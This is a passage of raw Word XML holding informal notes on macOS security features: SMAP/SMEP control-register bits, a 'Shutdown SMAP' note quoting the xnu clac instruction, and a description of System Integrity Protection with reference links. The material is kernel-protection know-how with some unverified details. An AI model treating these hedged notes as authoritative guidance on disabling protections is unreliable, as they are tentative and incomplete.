        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00302E7E">
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t>(network-client (remote tcp))</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BB6F65" w:rsidRDefault="00BB6F65" w:rsidP="00BB6F65">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="124" w:name="_Toc445313326"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Mac security mechanism</w:t>
      </w:r>
      <w:bookmarkEnd w:id="124"/>
    </w:p>
    <w:p w:rsidR="009A5D99" w:rsidRDefault="00701648" w:rsidP="009A5D99">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="15050AAA" wp14:editId="7D76E9E8">
            <wp:extent cx="5274310" cy="396305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963058"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00716C7F" w:rsidRDefault="009A5D99" w:rsidP="009A5D99">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r w:rsidR="003D4234">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>26</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> Osx Security model</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00701648" w:rsidRDefault="004106D2" w:rsidP="00716C7F">
      <w:hyperlink r:id="rId62" w:history="1">
        <w:r w:rsidR="009A5D99" w:rsidRPr="00BC79DA">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://derflounder.wordpress.com/2015/10/01/system-integrity-protection-adding-another-layer-to-apples-security-model/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="009A5D99" w:rsidRDefault="009A5D99" w:rsidP="00716C7F"/>
    <w:p w:rsidR="00716C7F" w:rsidRDefault="004106D2" w:rsidP="00716C7F">
      <w:pPr>
        <w:ind w:firstLine="210"/>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId63" w:history="1">
        <w:r w:rsidR="00716C7F">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://s3.amazonaws.com/s3.synack.com/Synack_Shakacon_OSX_Malware_Persistence.pdf</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="001F00F2" w:rsidRDefault="001F00F2" w:rsidP="001F00F2">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="125" w:name="_Toc445313327"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SMAP</w:t>
      </w:r>
      <w:bookmarkEnd w:id="125"/>
    </w:p>
    <w:p w:rsidR="001F00F2" w:rsidRDefault="001F00F2" w:rsidP="001F00F2">
      <w:pPr>
        <w:ind w:firstLine="210"/>
        <w:rPr>
          <w:color w:val="1F497D"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="CMR10" w:hAnsi="CMR10" w:cs="CMR10" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Introduced since Mac osx 10.10.3 on Intel </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="CMR10" w:hAnsi="CMR10" w:cs="CMR10"/>
        </w:rPr>
        <w:t>Broadwell</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="CMR10" w:hAnsi="CMR10" w:cs="CMR10" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> ?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001F00F2" w:rsidRPr="009A6D28" w:rsidRDefault="009A6D28" w:rsidP="00716C7F">
      <w:pPr>
        <w:ind w:firstLine="210"/>
        <w:rPr>
          <w:rFonts w:ascii="CMR10" w:hAnsi="CMR10" w:cs="CMR10"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009A6D28">
        <w:rPr>
          <w:rFonts w:ascii="CMR10" w:hAnsi="CMR10" w:cs="CMR10"/>
        </w:rPr>
        <w:t>SMEP is activated by bit 20 of control register CR4 while SMAP is bit 21.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009A6D28" w:rsidRDefault="009A6D28" w:rsidP="009A6D28">
      <w:pPr>
        <w:ind w:firstLine="210"/>
        <w:rPr>
          <w:rFonts w:ascii="CMR10" w:hAnsi="CMR10" w:cs="CMR10"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009A6D28">
        <w:rPr>
          <w:rFonts w:ascii="CMR10" w:hAnsi="CMR10" w:cs="CMR10" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>You could see CR4 in kernel crash log.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CC0D8D" w:rsidRPr="00CC0D8D" w:rsidRDefault="00CC0D8D" w:rsidP="00CC0D8D">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00CC0D8D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Shutdown SMAP</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CC0D8D" w:rsidRPr="00CC0D8D" w:rsidRDefault="00CC0D8D" w:rsidP="00CC0D8D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="425"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CC0D8D">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>clac        </w:t>
      </w:r>
      <w:r w:rsidRPr="00CC0D8D">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/*</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC0D8D">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> Clear EFLAGS.AC if SMAP is present/enabled */</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CC0D8D" w:rsidRDefault="00CC0D8D" w:rsidP="00CC0D8D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="709"/>
        <w:rPr>
          <w:rFonts w:ascii="CMR10" w:hAnsi="CMR10" w:cs="CMR10"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CC0D8D">
        <w:rPr>
          <w:rFonts w:ascii="CMR10" w:hAnsi="CMR10" w:cs="CMR10"/>
        </w:rPr>
        <w:t>M:\Work\Mac_All\Mac_source\10.10\xnu-2782.1.97\osfmk\x86_64\idt64.s</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CC0D8D" w:rsidRPr="00CC0D8D" w:rsidRDefault="00CC0D8D" w:rsidP="00CC0D8D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="709"/>
        <w:rPr>
          <w:rFonts w:ascii="CMR10" w:hAnsi="CMR10" w:cs="CMR10"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003A422D" w:rsidRDefault="003A422D" w:rsidP="003A422D">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="126" w:name="_Toc445313328"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>proc tracking</w:t>
      </w:r>
      <w:bookmarkEnd w:id="126"/>
    </w:p>
    <w:p w:rsidR="003A422D" w:rsidRDefault="003A422D" w:rsidP="003A422D">
      <w:pPr>
        <w:ind w:firstLine="210"/>
        <w:rPr>
          <w:color w:val="1F497D"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="CMR10" w:hAnsi="CMR10" w:cs="CMR10" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Since mac osx 10.11.?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009A5D99" w:rsidRDefault="009A5D99" w:rsidP="009A5D99">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="127" w:name="_Toc445313329"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SIP</w:t>
      </w:r>
      <w:bookmarkEnd w:id="127"/>
    </w:p>
    <w:p w:rsidR="00EE433A" w:rsidRDefault="00EE433A" w:rsidP="009A5D99">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="567"/>
        <w:rPr>
          <w:rFonts w:ascii="CMR10" w:hAnsi="CMR10" w:cs="CMR10"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId64" w:history="1">
        <w:r w:rsidRPr="005147D5">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="CMR10" w:hAnsi="CMR10" w:cs="CMR10"/>
          </w:rPr>
          <w:t>http://devstreaming.apple.com/videos/wwdc/2015/706nu20qkag/706/706_security_and_your_apps.pdf</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00EE433A" w:rsidRDefault="00EE433A" w:rsidP="009A5D99">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="567"/>
        <w:rPr>
          <w:rFonts w:ascii="CMR10" w:hAnsi="CMR10" w:cs="CMR10"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009A5D99" w:rsidRPr="00AA4C70" w:rsidRDefault="009A5D99" w:rsidP="009A5D99">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="567"/>
        <w:rPr>
          <w:rFonts w:ascii="CMR10" w:hAnsi="CMR10" w:cs="CMR10"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="CMR10" w:hAnsi="CMR10" w:cs="CMR10" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Security Integrity Proection since mac osx 10.11.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00716C7F" w:rsidRPr="009A5D99" w:rsidRDefault="009A5D99" w:rsidP="00716C7F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="CMR10" w:hAnsi="CMR10" w:cs="CMR10"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009A5D99">
        <w:rPr>
          <w:rFonts w:ascii="CMR10" w:hAnsi="CMR10" w:cs="CMR10"/>
        </w:rPr>
        <w:t>System Integrity Protection (SIP,</w:t>
      </w:r>
      <w:hyperlink r:id="rId65" w:anchor="cite_note-:2-1" w:history="1">
        <w:r w:rsidRPr="009A5D99">
          <w:rPr>
            <w:rFonts w:ascii="CMR10" w:hAnsi="CMR10" w:cs="CMR10"/>
          </w:rPr>
          <w:t>[1]</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="009A5D99">
        <w:rPr>
          <w:rFonts w:ascii="CMR10" w:hAnsi="CMR10" w:cs="CMR10"/>
        </w:rPr>
        <w:t xml:space="preserve"> sometimes referred to as rootless</w:t>
      </w:r>
      <w:hyperlink r:id="rId66" w:anchor="cite_note-:0-2" w:history="1">
        <w:r w:rsidRPr="009A5D99">
          <w:rPr>
            <w:rFonts w:ascii="CMR10" w:hAnsi="CMR10" w:cs="CMR10"/>
          </w:rPr>
          <w:t>[2]</w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId67" w:anchor="cite_note-3" w:history="1">
        <w:r w:rsidRPr="009A5D99">
          <w:rPr>
            <w:rFonts w:ascii="CMR10" w:hAnsi="CMR10" w:cs="CMR10"/>
          </w:rPr>
          <w:t>[3]</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="009A5D99">
        <w:rPr>
          <w:rFonts w:ascii="CMR10" w:hAnsi="CMR10" w:cs="CMR10"/>
        </w:rPr>
        <w:t xml:space="preserve">) is a security feature of </w:t>
      </w:r>
      <w:hyperlink r:id="rId68" w:tooltip="OS X El Capitan" w:history="1">
        <w:r w:rsidRPr="009A5D99">
          <w:rPr>
            <w:rFonts w:ascii="CMR10" w:hAnsi="CMR10" w:cs="CMR10"/>
          </w:rPr>
          <w:t>OS X El Capitan</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="009A5D99">
        <w:rPr>
          <w:rFonts w:ascii="CMR10" w:hAnsi="CMR10" w:cs="CMR10"/>
        </w:rPr>
        <w:t xml:space="preserve">, the </w:t>
      </w:r>
      <w:hyperlink r:id="rId69" w:tooltip="Operating system" w:history="1">
        <w:r w:rsidRPr="009A5D99">
          <w:rPr>
            <w:rFonts w:ascii="CMR10" w:hAnsi="CMR10" w:cs="CMR10"/>
          </w:rPr>
          <w:t>operating system</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="009A5D99">
        <w:rPr>
          <w:rFonts w:ascii="CMR10" w:hAnsi="CMR10" w:cs="CMR10"/>
        </w:rPr>
        <w:t xml:space="preserve"> by </w:t>
      </w:r>
      <w:hyperlink r:id="rId70" w:tooltip="Apple Inc." w:history="1">
        <w:r w:rsidRPr="009A5D99">
          <w:rPr>
            <w:rFonts w:ascii="CMR10" w:hAnsi="CMR10" w:cs="CMR10"/>
          </w:rPr>
          <w:t>Apple Inc.</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="009A5D99">
        <w:rPr>
          <w:rFonts w:ascii="CMR10" w:hAnsi="CMR10" w:cs="CMR10"/>
        </w:rPr>
        <w:t xml:space="preserve"> It protects certain system </w:t>
      </w:r>
      <w:hyperlink r:id="rId71" w:tooltip="Process (computing)" w:history="1">
        <w:r w:rsidRPr="009A5D99">
          <w:rPr>
            <w:rFonts w:ascii="CMR10" w:hAnsi="CMR10" w:cs="CMR10"/>
          </w:rPr>
          <w:t>processes</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="009A5D99">
        <w:rPr>
          <w:rFonts w:ascii="CMR10" w:hAnsi="CMR10" w:cs="CMR10"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:hyperlink r:id="rId72" w:tooltip="System file" w:history="1">
        <w:r w:rsidRPr="009A5D99">
          <w:rPr>
            <w:rFonts w:ascii="CMR10" w:hAnsi="CMR10" w:cs="CMR10"/>
          </w:rPr>
          <w:t>files</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="009A5D99">
        <w:rPr>
          <w:rFonts w:ascii="CMR10" w:hAnsi="CMR10" w:cs="CMR10"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:hyperlink r:id="rId73" w:tooltip="System folder" w:history="1">
        <w:r w:rsidRPr="009A5D99">
          <w:rPr>
            <w:rFonts w:ascii="CMR10" w:hAnsi="CMR10" w:cs="CMR10"/>
          </w:rPr>
          <w:t>folders</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="009A5D99">
        <w:rPr>
          <w:rFonts w:ascii="CMR10" w:hAnsi="CMR10" w:cs="CMR10"/>
        </w:rPr>
        <w:t xml:space="preserve"> from being modified or tampered with by other processes even when executed by the </w:t>
      </w:r>
      <w:hyperlink r:id="rId74" w:tooltip="Superuser" w:history="1">
        <w:r w:rsidRPr="009A5D99">
          <w:rPr>
            <w:rFonts w:ascii="CMR10" w:hAnsi="CMR10" w:cs="CMR10"/>
          </w:rPr>
          <w:t>root user</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="009A5D99">
        <w:rPr>
          <w:rFonts w:ascii="CMR10" w:hAnsi="CMR10" w:cs="CMR10"/>
        </w:rPr>
        <w:t xml:space="preserve"> or by a user with root privileges (</w:t>
      </w:r>
      <w:hyperlink r:id="rId75" w:tooltip="Sudo" w:history="1">
        <w:r w:rsidRPr="009A5D99">
          <w:rPr>
            <w:rFonts w:ascii="CMR10" w:hAnsi="CMR10" w:cs="CMR10"/>
          </w:rPr>
          <w:t>sudo</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="009A5D99">
        <w:rPr>
          <w:rFonts w:ascii="CMR10" w:hAnsi="CMR10" w:cs="CMR10"/>
        </w:rPr>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009A5D99" w:rsidRDefault="009A5D99" w:rsidP="009A5D99">
      <w:pPr>
        <w:ind w:firstLineChars="100" w:firstLine="220"/>
        <w:rPr>
          <w:rFonts w:ascii="CMR10" w:hAnsi="CMR10" w:cs="CMR10"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009A5D99">
        <w:rPr>
          <w:rFonts w:ascii="CMR10" w:hAnsi="CMR10" w:cs="CMR10"/>
        </w:rPr>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:hyperlink r:id="rId76" w:tooltip="Darwin (operating system)" w:history="1">
        <w:r w:rsidRPr="009A5D99">
          <w:rPr>
            <w:rFonts w:ascii="CMR10" w:hAnsi="CMR10" w:cs="CMR10"/>
          </w:rPr>
          <w:t>kernel</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="009A5D99">
        <w:rPr>
          <w:rFonts w:ascii="CMR10" w:hAnsi="CMR10" w:cs="CMR10"/>
        </w:rPr>
        <w:t xml:space="preserve"> then stops all processes without specific </w:t>
      </w:r>
      <w:hyperlink r:id="rId77" w:tooltip="Privilege (computing)" w:history="1">
        <w:r w:rsidRPr="009A5D99">
          <w:rPr>
            <w:rFonts w:ascii="CMR10" w:hAnsi="CMR10" w:cs="CMR10"/>
          </w:rPr>
          <w:t>privileges</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="009A5D99">
        <w:rPr>
          <w:rFonts w:ascii="CMR10" w:hAnsi="CMR10" w:cs="CMR10"/>
        </w:rPr>
        <w:t xml:space="preserve"> from writing to flagged files and folders and will prevent </w:t>
      </w:r>
      <w:hyperlink r:id="rId78" w:tooltip="Code injection" w:history="1">
        <w:r w:rsidRPr="009A5D99">
          <w:rPr>
            <w:rFonts w:ascii="CMR10" w:hAnsi="CMR10" w:cs="CMR10"/>
          </w:rPr>
          <w:t>code injection</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="009A5D99">
        <w:rPr>
          <w:rFonts w:ascii="CMR10" w:hAnsi="CMR10" w:cs="CMR10"/>
        </w:rPr>
        <w:t xml:space="preserve"> and runtime attachment (like </w:t>
      </w:r>
      <w:hyperlink r:id="rId79" w:tooltip="Debugger" w:history="1">
        <w:r w:rsidRPr="009A5D99">
          <w:rPr>
            <w:rFonts w:ascii="CMR10" w:hAnsi="CMR10" w:cs="CMR10"/>
          </w:rPr>
          <w:t>debugging</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="009A5D99">
        <w:rPr>
          <w:rFonts w:ascii="CMR10" w:hAnsi="CMR10" w:cs="CMR10"/>
        </w:rPr>
        <w:t>) with respect to flagged processes or processes signed with an Apple private entitlement key.</w:t>
      </w:r>
      <w:hyperlink r:id="rId80" w:anchor="cite_note-7" w:history="1">
        <w:r w:rsidRPr="009A5D99">
          <w:rPr>
            <w:rFonts w:ascii="CMR10" w:hAnsi="CMR10" w:cs="CMR10"/>
          </w:rPr>
          <w:t>[7</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00F93882" w:rsidRPr="00F93882" w:rsidRDefault="005366B4" w:rsidP="00F93882">
      <w:pPr>
        <w:ind w:firstLineChars="100" w:firstLine="220"/>
        <w:rPr>
          <w:rFonts w:ascii="CMR10" w:hAnsi="CMR10" w:cs="CMR10"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="CMR10" w:hAnsi="CMR10" w:cs="CMR10" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>e</w:t>
      </w:r>
      <w:r w:rsidR="00F93882" w:rsidRPr="00F93882">
        <w:rPr>
          <w:rFonts w:ascii="CMR10" w:hAnsi="CMR10" w:cs="CMR10"/>
        </w:rPr>
        <w:t>Summary</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F93882" w:rsidRPr="00F93882" w:rsidRDefault="00F93882" w:rsidP="00F93882">
      <w:pPr>
        <w:ind w:firstLineChars="100" w:firstLine="220"/>
        <w:rPr>
          <w:rFonts w:ascii="CMR10" w:hAnsi="CMR10" w:cs="CMR10"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F93882">
        <w:rPr>
          <w:rFonts w:ascii="CMR10" w:hAnsi="CMR10" w:cs="CMR10"/>
        </w:rPr>
        <w:t>New security policy applying to every process</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F93882" w:rsidRPr="00F93882" w:rsidRDefault="00F93882" w:rsidP="00F93882">
      <w:pPr>
        <w:ind w:firstLineChars="100" w:firstLine="220"/>
        <w:rPr>
          <w:rFonts w:ascii="CMR10" w:hAnsi="CMR10" w:cs="CMR10"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F93882">
        <w:rPr>
          <w:rFonts w:ascii="CMR10" w:hAnsi="CMR10" w:cs="CMR10"/>
        </w:rPr>
        <w:t>Protect the system by default, on disk and at runtime</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F93882" w:rsidRPr="00F93882" w:rsidRDefault="00F93882" w:rsidP="00F93882">
      <w:pPr>
        <w:ind w:firstLineChars="100" w:firstLine="220"/>
        <w:rPr>
          <w:rFonts w:ascii="CMR10" w:hAnsi="CMR10" w:cs="CMR10"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F93882">
        <w:rPr>
          <w:rFonts w:ascii="CMR10" w:hAnsi="CMR10" w:cs="CMR10" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>•</w:t>
      </w:r>
      <w:r w:rsidRPr="00F93882">
        <w:rPr>
          <w:rFonts w:ascii="CMR10" w:hAnsi="CMR10" w:cs="CMR10"/>
        </w:rPr>
        <w:t xml:space="preserve"> Restrict write access to system location</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F93882" w:rsidRPr="00F93882" w:rsidRDefault="00F93882" w:rsidP="00F93882">
      <w:pPr>
        <w:ind w:firstLineChars="100" w:firstLine="220"/>
        <w:rPr>
          <w:rFonts w:ascii="CMR10" w:hAnsi="CMR10" w:cs="CMR10"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F93882">
        <w:rPr>
          <w:rFonts w:ascii="CMR10" w:hAnsi="CMR10" w:cs="CMR10" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>•</w:t>
      </w:r>
      <w:r w:rsidRPr="00F93882">
        <w:rPr>
          <w:rFonts w:ascii="CMR10" w:hAnsi="CMR10" w:cs="CMR10"/>
        </w:rPr>
        <w:t xml:space="preserve"> Prevent runtime attachment and code injection into system binaries</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F93882" w:rsidRPr="00F93882" w:rsidRDefault="00F93882" w:rsidP="00F93882">
      <w:pPr>
        <w:ind w:firstLineChars="100" w:firstLine="220"/>
        <w:rPr>
          <w:rFonts w:ascii="CMR10" w:hAnsi="CMR10" w:cs="CMR10"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F93882">
        <w:rPr>
          <w:rFonts w:ascii="CMR10" w:hAnsi="CMR10" w:cs="CMR10"/>
        </w:rPr>
        <w:t>3rd-party content must be migrated out of system locations</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F93882" w:rsidRDefault="00F93882" w:rsidP="00F93882">
      <w:pPr>
        <w:ind w:firstLineChars="100" w:firstLine="220"/>
        <w:rPr>
          <w:rFonts w:ascii="CMR10" w:hAnsi="CMR10" w:cs="CMR10"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F93882">
        <w:rPr>
          <w:rFonts w:ascii="CMR10" w:hAnsi="CMR10" w:cs="CMR10"/>
        </w:rPr>
        <w:t>Configuration mechanism in the Recovery OS</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F93882" w:rsidRDefault="00F93882" w:rsidP="00F93882">
      <w:pPr>
        <w:ind w:firstLineChars="100" w:firstLine="220"/>
        <w:rPr>
          <w:rFonts w:ascii="CMR10" w:hAnsi="CMR10" w:cs="CMR10"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00F93882" w:rsidRDefault="004106D2" w:rsidP="00F93882">
      <w:pPr>
        <w:ind w:firstLineChars="100" w:firstLine="220"/>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:ascii="CMR10" w:hAnsi="CMR10" w:cs="CMR10"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId81" w:history="1">
        <w:r w:rsidR="00153A72" w:rsidRPr="00186033">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="CMR10" w:hAnsi="CMR10" w:cs="CMR10"/>
          </w:rPr>
          <w:t>http://www.freebuf.com/articles/system/97411.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="004106D2" w:rsidRDefault="004106D2" w:rsidP="00F93882">
      <w:pPr>
        <w:ind w:firstLineChars="100" w:firstLine="220"/>
        <w:rPr>
          <w:rFonts w:ascii="CMR10" w:hAnsi="CMR10" w:cs="CMR10"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004106D2">
        <w:rPr>
          <w:rFonts w:ascii="CMR10" w:hAnsi="CMR10" w:cs="CMR10" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SIP</w:t>
      </w:r>
      <w:r w:rsidRPr="004106D2">
        <w:rPr>
          <w:rFonts w:ascii="CMR10" w:hAnsi="CMR10" w:cs="CMR10" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>全名</w:t>
      </w:r>
      <w:r w:rsidRPr="004106D2">
        <w:rPr>
          <w:rFonts w:ascii="CMR10" w:hAnsi="CMR10" w:cs="CMR10" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>System Integrity Protection</w:t>
      </w:r>
      <w:r w:rsidRPr="004106D2">
        <w:rPr>
          <w:rFonts w:ascii="CMR10" w:hAnsi="CMR10" w:cs="CMR10" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（系统完整性保护），它是为了保护系统进程，文件，文档不被其它进程修改，不管是否为</w:t>
      </w:r>
      <w:r w:rsidRPr="004106D2">
        <w:rPr>
          <w:rFonts w:ascii="CMR10" w:hAnsi="CMR10" w:cs="CMR10" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>root user</w:t>
      </w:r>
      <w:r w:rsidRPr="004106D2">
        <w:rPr>
          <w:rFonts w:ascii="CMR10" w:hAnsi="CMR10" w:cs="CMR10" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="004106D2">
        <w:rPr>
